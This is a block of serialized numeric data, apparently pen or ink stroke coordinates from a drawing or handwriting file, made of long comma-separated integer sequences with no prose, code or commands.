0 1,0 0-1,-1 0 0,1 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 1,0 0-1,0 1 0,0-1 0,0 0 1,0 1-1,-1-1 0,1 0 0,0 1 1,0-1-1,0 1 0,1 1-17,0 0 0,0 0 0,-1 0 1,1 0-1,-1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,1 4 0,1 6-4,0 0 0,-1 0 0,-1 0 0,0 16 0,10 31 71,-11-55-230,0-2 37,1 1 0,-1-1-1,0 0 1,0 1 0,0-1 0,-1 0-1,1 1 1,-1-1 0,1 0 0,-1 0 0,0 1-1,1-1 1,-1 0 0,0 0 0,-3 4-1,-1-1 239,5-4-235,0-1 1,0 1-1,-1-1 1,1 1 0,0-1-1,-1 0 1,1 1-1,0-1 1,-1 1-1,1-1 1,-1 0 0,1 0-1,0 1 1,-1-1-1,1 0 1,-1 0 0,1 1-1,-1-1 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,1-1-1,-1 1 1,1 0 0,-1 0-1,1 0 1,-1-1-1,1 1 1,-1 0-1,1-1 1,0 1 0,-1 0-1,1-1 1,0 1-1,-1-1 1,-1-1 27,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 0-1,1 0 1,-1 0 0,1-1 0,-1 1 0,1 0 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1-4 0,0 2-58,1 0 1,-1 0-1,1-1 1,1 1 0,-1 0-1,1-1 1,0 1 0,0 0-1,2-6 1,0 4-66,-1 0 1,1 0-1,1 1 0,-1-1 1,1 1-1,0 0 1,0 0-1,1 0 0,0 0 1,0 1-1,6-5 0,46-27-5659,-1 7-5703,-37 23 8055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2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119 105 72,'0'0'124,"-1"0"0,0 0 0,1 0 1,-1 0-1,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 1,1 1-1,-1-1 0,0 0 0,0 0 0,1 1 0,-1-1 0,1 0 0,-1 1 1,0-1-1,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 1,1 1-1,-1-1 0,1 1 0,-1 0 0,1-1 0,0 1 0,-1 0 1,1-1-1,0 1 0,0 0 0,0 0 0,-1-1 0,1 1 0,0 0 1,0 0-1,0-1 0,0 1 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 1,0-1-1,0 1 0,1 0 0,-1 0 0,2 4 170,0-1 0,0 0 1,0 1-1,1-1 0,-1 0 0,6 6 0,-4-7-223,0 0 0,0 0 0,0 0-1,0 0 1,0-1 0,0 0 0,1 0 0,-1 0-1,1 0 1,-1-1 0,1 1 0,0-1 0,0-1 0,0 1-1,-1-1 1,1 1 0,0-1 0,0-1 0,0 1-1,0-1 1,0 0 0,-1 0 0,8-2 0,-5 1 116,-1 0 0,0 0 0,0-1 0,0 1 0,0-1 0,-1 0 0,1-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,-1-1 0,1 0 0,-1 1 0,0-2 0,6-9 0,-8 11-20,0 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,-1 0 1,0 0-1,0-1 0,0 1 0,-1 0 0,1 0 0,-1 0 0,0-1 0,-2-6 0,1 8-104,1 1 0,-1-1 0,1 1 0,-1 0-1,0 0 1,1-1 0,-1 1 0,-1 0-1,1 1 1,0-1 0,0 0 0,-1 0 0,1 1-1,0 0 1,-1-1 0,0 1 0,1 0-1,-1 0 1,0 0 0,0 1 0,1-1 0,-1 1-1,0-1 1,0 1 0,-5 0 0,-21 0 292,17-1-276,0 1-1,-1 0 1,1 1 0,0 0-1,-1 1 1,1 1-1,-13 4 1,10-1-72,0 1 1,1 1-1,0 1 1,-25 19-1,28-20-34,9-6-71,0-1-1,0 1 1,1 0-1,-1 0 0,0 0 1,1 0-1,-1 0 0,1 0 1,0 0-1,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,0 0 0,1 1 1,-1-1-1,1 1 1,0-1-1,0 4 0,0-3-531,0 0 0,1 0-1,-1-1 1,1 1 0,-1 0-1,1 0 1,0-1 0,0 1-1,0-1 1,1 1 0,-1-1-1,1 1 1,-1-1 0,1 0 0,0 0-1,3 4 1,6 1-2660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29 668,'-2'-11'4354,"-6"11"1791,14 11-2546,9 8-1691,-5 18-1096,-5-28-670,1 6 146,-6 117 702,0-131-979,0 0 0,0 0 0,0-1 0,0 1 1,0 0-1,0 0 0,0-1 0,0 1 0,0 0 1,0 0-1,0-1 0,1 1 0,-1 0 0,0-1 1,1 1-1,-1 0 0,0-1 0,1 1 0,-1 0 0,1-1 1,-1 1-1,1-1 0,-1 1 0,1-1 0,-1 1 1,1-1-1,0 1 0,-1-1 0,1 0 0,0 1 1,-1-1-1,1 0 0,0 1 0,-1-1 0,1 0 0,0 0 1,0 0-1,-1 0 0,1 0 0,0 0 0,0 0 1,-1 0-1,1 0 0,0 0 0,0 0 0,-1 0 1,1 0-1,0-1 0,-1 1 0,1 0 0,0-1 0,-1 1 1,1 0-1,1-1 0,45-27 418,-34 19-453,59-43 47,-70 51-26,8 19-9,-10-12 15,0-6 5,0 1 1,0-1-1,0 1 0,0 0 0,0-1 0,0 1 1,0-1-1,1 1 0,-1-1 0,0 1 0,0-1 1,0 1-1,0-1 0,1 1 0,-1-1 0,0 1 1,0-1-1,1 0 0,-1 1 0,0-1 0,1 1 1,-1-1-1,1 0 0,-1 1 0,0-1 0,1 0 1,-1 1-1,1-1 0,-1 0 0,1 0 0,-1 1 1,1-1-1,-1 0 0,1 0 0,-1 0 0,1 0 1,-1 0-1,1 0 0,-1 0 0,1 0 0,0 0 1,-1 0-1,1 0 0,-1 0 0,1 0 0,-1 0 1,1 0-1,-1-1 0,1 1 0,-1 0 0,1 0 1,-1-1-1,0 1 0,1 0 0,-1 0 0,1-1 1,0 0-1,22-15 1032,-19 12-965,0 0 0,0 0 1,-1 0-1,1 0 0,-1-1 0,0 0 0,-1 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,0-1 0,-1 1 0,2-8 0,7-48 94,-10 58-167,1 0-19,-1 1-1,0 0 0,0 0 1,0-1-1,0 1 0,0 0 1,-1-1-1,1 1 0,-1 0 1,1-1-1,-1 1 0,0 0 0,0 0 1,0 0-1,-3-4 0,4 6-80,0-1-1,0 1 1,0 0-1,0 0 1,0 0-1,0-1 1,0 1-1,-1 0 1,1 0-1,0 0 1,0-1-1,0 1 1,0 0-1,-1 0 0,1 0 1,0 0-1,0 0 1,-1-1-1,1 1 1,0 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,-1 1-1,1-1 1,0 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0 1 1,0-1-1,0 0 1,0 0-1,-1 0 1,1 1-1,0-1 0,0 0 1,0 0-1,0 0 1,0 1-1,0-1 1,0 0-1,-1 0 1,1 1-1,0-1 1,0 0-1,0 0 1,0 1-1,0-1 1,0 0-1,0 1 1,-1 18-9793,1-18 9500,0 6-2855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43 320,'-17'-11'3168,"12"8"-2397,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,-1 0 0,1 0 1,-1 1-1,1-1 0,-1 1 0,0 1 0,-9-1 0,-12-2 1303,24 2-1845,0 0 0,0 1-1,0-1 1,0 1 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,0 1 0,0-1-1,0 1 1,-4 2 0,5-2 213,2-1-434,-1 0-1,1 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,-1 0-1,1 1 0,-1-1 1,1 0-1,0 0 0,0 0 1,-1 1-1,1-1 0,0 0 1,-1 0-1,1 1 0,0-1 1,0 0-1,-1 1 0,1-1 1,0 0-1,0 1 0,0-1 0,0 0 1,-1 1-1,1-1 0,0 0 1,0 1-1,0-1 0,0 0 1,0 1-1,0-1 0,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,1 1 0,-1-1 1,0 0-1,0 1 0,0-1 1,10 27-11,-2-6 4,-8-18-2,1 0 0,-1 0 0,1 0-1,0 0 1,0 0 0,0 0 0,0 0 0,0 0-1,3 3 1,-3-3 0,1-1-1,-1 1 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,-1 4 1,11 23-11,-11-28 13,1-1 0,-1 1 1,0 0-1,0-1 0,0 1 0,-1-1 1,1 1-1,0-1 0,-1 1 0,1-1 1,-1 1-1,1-1 0,-1 1 0,0-1 1,1 1-1,-1-1 0,0 0 1,-2 3-1,-6 7 19,8-9-18,0-1-1,0 1 1,0-1 0,0 1-1,0-1 1,-1 0-1,1 0 1,-1 1 0,1-1-1,-1 0 1,1 0-1,-1 0 1,0 0 0,1-1-1,-4 2 1,-17 8 16,13-12 4,-5-6-11,14 8-180,-1-1 0,1 1 0,0-1 0,0 1 0,-1-1 0,1 0 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 1,1 1-1,-1-1 0,1 0 0,0 0-464,0-1 1,0 1 0,0-1 0,0 1 0,0 0 0,0 0-1,0-1 1,1 1 0,-1 0 0,0 0 0,1 0 0,-1 1 0,1-1-1,0 0 1,2 0 0,6 0-2421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4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44 108 1612,'3'2'488,"-1"-1"1,1 0-1,-1 0 0,1 0 0,-1-1 1,1 1-1,0-1 0,-1 1 0,1-1 0,0 0 1,4 0-1,28-10 1488,-24 5-1602,-1-1 0,0 0 0,-1-1 1,9-8-1,-7 7-78,-10 7-143,1 0 0,-1 0 1,1 0-1,-1 0 0,1-1 1,-1 1-1,0 0 1,0-1-1,0 1 0,1-1 1,-1 1-1,-1-1 0,1 1 1,0-1-1,0 0 1,-1 1-1,1-1 0,0 0 1,-1 0-1,0 1 1,1-1-1,-1 0 0,0 0 1,0-3-1,7-3 806,-5 6-682,-11-2 4,2 3-126,0 0 1,0 0 0,0 1-1,0 0 1,0 0-1,-1 1 1,1-1 0,0 2-1,1-1 1,-1 1-1,0 0 1,0 0 0,1 1-1,-1 0 1,-6 4-1,4-2-59,1 0-1,0 0 0,0 1 1,0 0-1,0 1 1,1-1-1,0 1 0,1 1 1,-11 14-1,16-20-92,1 0 0,-1-1 0,1 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,2 0 0,-1-1 0,0 1 0,0 0 0,0 0 0,1-1 0,-1 1 0,1 0 0,0-1 0,-1 1 0,1-1 1,0 1-1,2 2 0,21 27 98,-12-24-302,0 0 0,1 0-1,-1-1 1,1-1-1,1 0 1,-1-1 0,1 0-1,-1-1 1,1-1 0,0 0-1,0-1 1,21-1 0,-30 0-373,0 0 0,0-1 0,0 0 0,0 0 0,0 0 0,0-1 0,-1 0 0,8-3 1,14-5-6227,-15 9 3309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12 474 892,'0'0'5813,"-11"7"2077,17-9-7471,-1 0-1,1 1 1,-1-2 0,1 1-1,-1-1 1,0 0-1,0 0 1,6-5-1,62-46 550,-46 35-868,45-41-1,8-13-111,-44 42 84,-1-2 0,42-52-1,-23 24 171,-35 47 46,-17 13-213,-1 1-1,0-1 1,1 1-1,-1-1 1,0 0 0,0 1-1,0-1 1,0 0 0,1 0-1,-1 0 1,0 0 0,0 0-1,-1 0 1,1 0 0,0 0-1,0 0 1,0-1-1,-1 1 1,1 0 0,-1 0-1,2-3 1,-2 4-52,1 0-1,-1 0 1,1 0 0,-1 0 0,1 0-1,-1 1 1,1-1 0,-1 0-1,0 0 1,1 1 0,-1-1 0,1 0-1,-1 1 1,1-1 0,-1 0-1,0 1 1,1-1 0,-1 0-1,0 1 1,0-1 0,1 1 0,-1-1-1,0 1 1,0-1 0,1 1-1,-1-1 1,0 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0 0-1,-10 52 769,9-35-703,2-1 0,0 0 1,6 28-1,-4-30-77,-1 0-1,-1 0 1,0 0 0,-2 22-1,0-22-3,1-1 0,0 1 0,1-1 0,4 21 0,3 12-2,-7-36-3,1 0 1,0 0 0,0-1-1,8 21 1,-2-10 7,-8-17-12,1-1-1,0 1 1,0-1 0,0 0-1,0 0 1,1 1 0,-1-1-1,1 0 1,0 0 0,0-1-1,0 1 1,3 3 0,-3-5-25,-2-1-29,0 0-1,0-1 0,0 1 1,0 0-1,0 0 1,0 0-1,0-1 1,-1 1-1,1 0 0,0 0 1,0 0-1,0-1 1,0 1-1,0 0 1,0 0-1,-1 0 0,1-1 1,0 1-1,0 0 1,0 0-1,0 0 1,-1 0-1,1 0 0,0-1 1,0 1-1,-1 0 1,1 0-1,0 0 1,0 0-1,0 0 0,-1 0 1,1 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 0,0 0 1,-1 0-1,1 1 1,0-1-1,0 0 1,0 0-1,-1 0 0,1 0 1,0 0-1,0 0 1,0 1-1,-1-1 1,1 0-1,0 0 0,0 0 1,0 1-1,0-1 1,0 0-1,0 0 1,0 0-1,-1 1 0,1-1 1,0 0-1,0 0 1,0 1-1,0-1 0,-30-37-11978,26 26 8689,-5-1 111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 1708,'-22'-5'10155,"55"5"-6184,96 30-2971,-45-14-5704,-39-14-3234,-34 3 4954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67 1464,'-10'-12'11898,"10"14"-11686,0-1 0,0 1 0,0-1 0,0 1 0,0-1 1,0 1-1,0-1 0,-1 1 0,1-1 0,0 1 0,-1-1 0,0 1 0,1-1 1,-1 1-1,0-1 0,1 0 0,-1 1 0,0-1 0,-1 1 0,1 2-146,0-1 0,0 1 1,0 0-1,0-1 0,1 1 0,0 0 0,0-1 0,0 1 0,0 0 0,2 6 0,-1 5 43,-5 45 93,2-46-165,1 0 1,0 0-1,1 0 1,1 0-1,4 25 1,6 25 493,-9-55-460,-1 0 0,0 0-1,0 0 1,-1 17 0,-4-3 75,4-23-141,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,-1-3-4,0 1 0,0-1 0,0 0 0,1 0 1,-1 0-1,1 0 0,0 0 0,0 0 0,1 0 0,0-4 0,0-5-7,-2-8 6,1 1 1,1 0-1,1 0 1,1 0-1,1 0 1,8-28 0,-1 13 13,-10 29-14,0 0 0,1 1 0,-1-1 0,1 0 0,1 1 0,-1 0 1,1-1-1,6-7 0,-8 10 0,7-8-2,0 0 0,1 0 0,0 1 0,1 0 0,-1 1 1,2 0-1,0 0 0,0 1 0,18-10 0,-6 8-5,-15 6-2,1 0 1,-1 0-1,1 1 0,0 0 1,0 1-1,0 0 0,0 1 1,15-2-1,-24 4 8,-1-1 1,1 0-1,0 0 1,-1 1-1,1-1 0,0 0 1,-1 0-1,1 1 1,0-1-1,-1 0 0,1 1 1,0-1-1,0 0 1,0 1-1,-1-1 1,1 0-1,0 1 0,0-1 1,0 1-1,0-1 1,0 0-1,0 1 0,-1-1 1,1 1-1,0-1 1,0 1-1,0-1 1,1 0-1,-1 1 0,0-1 1,0 1-1,0-1 1,0 0-1,0 1 0,0-1 1,0 1-1,1-1 1,-1 0-1,0 1 1,0-1-1,1 0 0,-1 1 1,0-1-1,1 0 1,-1 1-1,0-1 0,0 0 1,1 0-1,-1 1 1,1-1-1,-1 0 1,0 0-1,1 0 0,-1 0 1,1 0-1,-1 1 1,0-1-1,1 0 0,-1 0 1,1 0-1,-1 0 1,0 0-1,1 0 1,-1 0-1,1 0 0,-1 0 1,1 0-1,-1-1 1,1 1-1,-27 24-16,24-22 13,-17 14-16,-2-2 0,0 0-1,0-1 1,-1-1 0,-25 10 0,34-16-497,0 2-1,0 0 1,0 0-1,1 1 1,-19 17-1,29-13-3374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29 1348,'11'1'11214,"-1"42"-6624,0-14-3826,-8-26-711,0 0 0,-1 1 0,1 0 0,-1-1 0,0 1 0,0 0 0,0 0 1,0 5-1,3 33 230,-2-36-255,-1 1 0,0-1 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 0 0,-1 1 1,0-1-1,-3 10 0,-7 25 98,0 15 324,9-34-153,2-21-280,0 1-1,1-1 0,-1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,0 0-1,0-1 1,-1 2-1,-9 12 87,11-15-89,1 1 0,-1 0 1,0-1-1,0 1 0,0 0 0,0 0 0,0-1 0,0 1 1,0 0-1,0-1 0,0 1 0,0 0 0,0-1 0,0 1 1,0 0-1,0-1 0,0 1 0,0 0 0,0-1 1,0 1-1,0 0 0,0-1 0,-1 1 0,1 0 0,0 0 1,0-1-1,0 1 0,-1 0 0,1 0 0,0-1 0,0 1 1,-1 0-1,1 0 0,0 0 0,0-1 0,-1 1 1,1 0-1,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 1,-1-1-1,1 1 0,0 0 0,-1 0 0,1 0 0,0 0 1,-1 0-1,1 0 0,0 0 0,-1 1 0,1-1 0,0 0 1,-1 0-1,1 0 0,0 0 0,0 0 0,-1 0 1,1 0-1,0 1 0,-1-1 0,1 0 0,0 0 0,0 0 1,-1 1-1,1-1 0,1-4 52,0-1 0,1 1 0,-1 0 0,1 0 0,0 0 0,0-1 0,3-3 0,9-20 50,-5 3-109,1 1 1,1 0-1,1 0 0,1 1 0,0 1 0,2 1 1,1 0-1,1 0 0,0 2 0,2 0 1,0 1-1,1 1 0,0 1 0,39-23 1,-56 37 2,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,0 0 0,0 1 0,-1-1 0,8 0 0,-10 1-9,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 1 0,0-1-1,0 0 1,0 0 0,0 1 0,0-1 0,0 0 0,-1 1 0,1-1-1,0 1 1,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,-1 0 0,1-1-1,-1 1 1,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0-1,0 1 1,-1 3 0,0 0-1,0-1 0,0 1 1,-1 0-1,0-1 1,0 0-1,0 1 0,-1-1 1,1 0-1,-1 0 1,0 0-1,0-1 0,-1 1 1,1-1-1,-1 0 0,1 0 1,-6 4-1,-11 8 0,-40 22 1,42-27-125,0-1 1,0-1 0,-39 13 0,6-15-2519,42-8 1950,7-8-4801,12-8-2656,-9 12 5109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8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 2100,'-20'-5'10020,"20"5"-9967,-1 0 0,1 0 0,0 0 0,0 1 1,0-1-1,-1 0 0,1 0 0,0 0 0,0 1 1,0-1-1,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 1,0 0-1,0 1 0,0-1 0,0 0 0,0 0 1,0 1-1,0-1 0,0 0 0,0 0 0,0 1 0,0-1 1,0 0-1,0 0 0,0 1 0,0-1 0,1 0 0,-1 0 1,0 1-1,0-1 0,0 0 0,0 0 0,0 1 1,1-1-1,-1 0 0,0 0 0,0 0 0,0 1 0,0-1 1,1 0-1,-1 0 0,0 0 0,0 0 0,1 0 1,-1 0-1,0 1 0,0-1 0,1 0 0,-1 0 0,0 0 1,0 0-1,1 0 0,-1 0 0,18 6-823,-17-6 125,5 0 715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59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4839 8 440,'-11'-7'6973,"11"7"-6827,0 1-1,0-1 0,0 1 0,0-1 0,0 1 0,0-1 1,0 1-1,0-1 0,0 1 0,0-1 0,1 1 1,-1-1-1,0 1 0,0-1 0,1 0 0,-1 1 1,0-1-1,0 1 0,1-1 0,-1 0 0,0 1 1,1-1-1,-1 0 0,1 1 0,-1-1 0,0 0 0,1 0 1,-1 1-1,1-1 0,-1 0 0,1 0 0,-1 0 1,1 0-1,-1 0 0,1 1 0,-1-1 0,1 0 1,-1 0-1,1 0 0,-1 0 0,1 0 0,-1-1 1,1 1-1,-1 0 0,1 0 0,-1 0 0,0 0 1,1 0-1,-1-1 0,1 1 0,-1 0 0,4-4 3370,-4 5-3305,0 1-1,-1-1 0,1 0 0,-1 1 0,0-1 0,1 0 1,-1 0-1,0 1 0,0-1 0,1 0 0,-1 0 0,0 0 1,0 0-1,-2 1 0,-13 15 257,15-15-424,-1 0 0,1 1 0,-1-1-1,0 0 1,0 0 0,0-1 0,0 1-1,0 0 1,0-1 0,0 1 0,-4 1-1,1-1 53,0 1 0,0-1-1,0 1 1,0 1 0,0-1-1,0 1 1,-6 6-1,-29 20 322,-89 43 590,45-19-347,-166 74 616,131-80-951,1 1 296,53-27-260,20-8-90,-67 17 609,43-13-509,-99 18 449,140-31-670,-33-1 338,48-4-320,0 1 0,0 0-1,-25 5 1,11-1-62,-1-1-1,1-1 1,-1-2-1,0-1 1,-28-3-1,-20 0-100,32 4 88,18 0 54,-1-1 1,-46-7-1,51 1-145,14 4 0,1 1 0,-1-1 0,1 1 0,-1 0 0,0 1 0,-12 0 0,-118-6 0,93 4 0,33 1 0,0 0 0,0 1 0,0 0 0,-14 3 0,16-2 0,0 0 0,0-1 0,0 0 0,-19-3 0,-22-1 0,-57-8 0,-41-6 0,7 24 0,131-7 0,0-3 0,-23-6 0,-1 1 0,0 2 0,-1 2 0,-50-2 0,77 8 0,-19-7 0,1-2 0,16 4 0,-5 0 0,0 1 0,0 1 0,-27-1 0,15 1 0,9-2 0,-1 0 0,0 2 0,0 0 0,0 2 0,0 0 0,0 1 0,0 1 0,-21 4 0,-61 4 0,-81-4 0,119 0 0,-76 0 0,129-6 0,0-1 0,0-1 0,0 0 0,-21-7 0,21 6 0,-96-20 0,42 10 0,-21-8 0,66 8 0,17 10 0,1 0 0,-1 1 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,-6-1 0,4 1 0,0 0 0,1 0 0,-1-1 0,1 1 0,-1-1 0,1 0 0,-6-5 0,-36-22 0,-16-2 0,61 27 0,2 4 0,-1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,-1-1 0,-9-5 0,3 0 0,1 1 0,0-2 0,1 1 0,0-1 0,-8-11 0,11 12 0,-1 1 0,1-1 0,-1 1 0,0 0 0,-1 0 0,0 0 0,0 1 0,0 0 0,-12-7 0,11 9 0,-3-7 0,6 5 0,0 0 0,-3 3 0,4-5 0,2 4 0,-2 3 0,3 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,-1 1 0,1 0 0,0-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-2 0 0,-8-9 0,10 9 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1-1 0,1 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,-5-2 0,3-15 0,0 12 0,-5 5 0,-49-13-13379,54 11 12615,-1 1-1,0 0 0,0 0 0,0 0 1,0 1-1,0-1 0,0 1 1,0-1-1,0 1 0,0 0 0,-6 1 1,-5 0-1923,-17-1-1642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0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13 437 976,'-1'0'145,"1"0"1,-1 0-1,0-1 1,1 1-1,-1 0 1,0 0-1,1-1 0,-1 1 1,1-1-1,-1 1 1,1-1-1,-1 1 0,1-1 1,-1 1-1,1-1 1,-1 1-1,1-1 0,-1 0 1,1 1-1,0-1 1,-1 0-1,1 1 0,0-1 1,0 0-1,-1 1 1,1-1-1,0 0 1,0 1-1,0-1 0,0 0 1,0 0-1,0 1 1,0-1-1,0 0 0,0 1 1,1-2-1,-1 0 183,0 1-1,0-1 0,0 1 1,1-1-1,-1 1 1,0-1-1,1 1 1,-1-1-1,1 1 0,-1 0 1,1-1-1,0 1 1,0 0-1,0-1 1,-1 1-1,3-2 0,-1 2 366,-2-9 1113,1-9 3012,7 10-4336,-7 9-449,-1-1 0,1 0 1,-1 0-1,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 1,0-1-1,0 1 0,0 0 0,0 0 0,-1-2 0,0 2-3,1-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,1-1 0,-1 1-1,0-1 1,1 1 0,0-2 0,0 1 9,0 0-1,1-1 0,-1 1 0,0 0 1,0-1-1,-1 1 0,1-1 0,0 1 1,-1-1-1,1 1 0,-1-1 1,0-3-1,8-27 199,-7 27-187,1 0 0,-1 0-1,0 0 1,-1-1 0,0 1 0,0 0-1,0 0 1,-2-11 0,1-7 204,11-7 247,-10 29-470,0 0 1,0 0 0,0 0-1,0 0 1,0 0 0,0-1-1,1 1 1,-1 0-1,1 0 1,0 0 0,-1 0-1,1 0 1,0 1 0,0-1-1,2-3 1,-2 2 27,0 0 1,0 0 0,-1 1-1,1-1 1,-1 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0-1,-1-2 1,0-6 285,1 10-204,2-29 1175,39 35-1115,8 5-70,0-3 0,0-1 0,1-3 0,62-4 0,-63 1-123,163-12 67,-190 9-76,-20 2-37,-1 1 0,1-1-1,0 1 1,-1 0 0,1 0-1,-1 0 1,1-1 0,0 1-1,-1 1 1,1-1 0,-1 0-1,1 0 1,0 1-1,-1-1 1,1 1 0,-1-1-1,3 2 1,-4-1-136,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,-1-1-1,1 1 1,0 0-1,-1 0 0,1 0 1,-1 0-1,1 0 0,-1-1 1,1 1-1,-1 0 1,0-1-1,1 1 0,-1 0 1,0-1-1,1 1 1,-2 0-1,-18 17-5372,-2-6-2620,12-11 3772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3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32 48,'0'6'15243,"-9"0"-14026,10-6-1195,-1 0 0,0 0-1,1 0 1,-1 0 0,0 0 0,1 0-1,-1 0 1,1 0 0,-1 0 0,0 0-1,1 0 1,-1 0 0,0-1 0,1 1-1,-1 0 1,0 0 0,1 0 0,-1-1-1,0 1 1,0 0 0,1 0 0,-1-1-1,0 1 1,0 0 0,1-1 0,-1 1-1,0 0 1,0-1 0,0 1 0,0 0-1,1-1 1,-1 1 0,0 0 0,0-1-1,0 1 1,0 0 0,0-1 0,0 1-1,0-1 1,0 1 0,0 0 0,0-1-1,0 1 1,0 0 0,0-1 0,-1 0 262,25-16-189,-17 16-99,13-4-4,-18 4 8,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0-1,1 0 1,1 1 0,10-1 14,-8-1-15,0 1-1,-1 0 1,1 0 0,0 0 0,0 1 0,0 0-1,0 0 1,5 2 0,20 4 11,-30-7-12,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0 0,1 1-1,-1-1 1,0 0-1,1 1 1,-1-1-1,0 1 1,1 0-1,-1-1 1,0 1-1,2 1 1,5 7-42,-8-9 42,1 0 1,0 1-1,0-1 0,0 1 0,-1-1 0,1 1 0,0 0 0,0-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1-1 0,-1 1 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 1 0,-1 7 11,-1 0 0,0 0 0,0 0 0,-1 0 0,0-1 0,-1 1 0,0-1 0,0 0 0,-6 8 0,-10 24 20,11-27-20,8-12-9,0 0-1,0 0 1,0 0 0,0 0-1,0 0 1,0 1-1,1-1 1,-1 0-1,0 0 1,1 1 0,-1-1-1,1 1 1,0-1-1,-1 0 1,1 1-1,0 1 1,-11 59 42,11-56-39,1 0 0,0 0 1,0 1-1,1-1 1,0 0-1,0 0 0,0-1 1,1 1-1,-1 0 0,1-1 1,1 1-1,-1-1 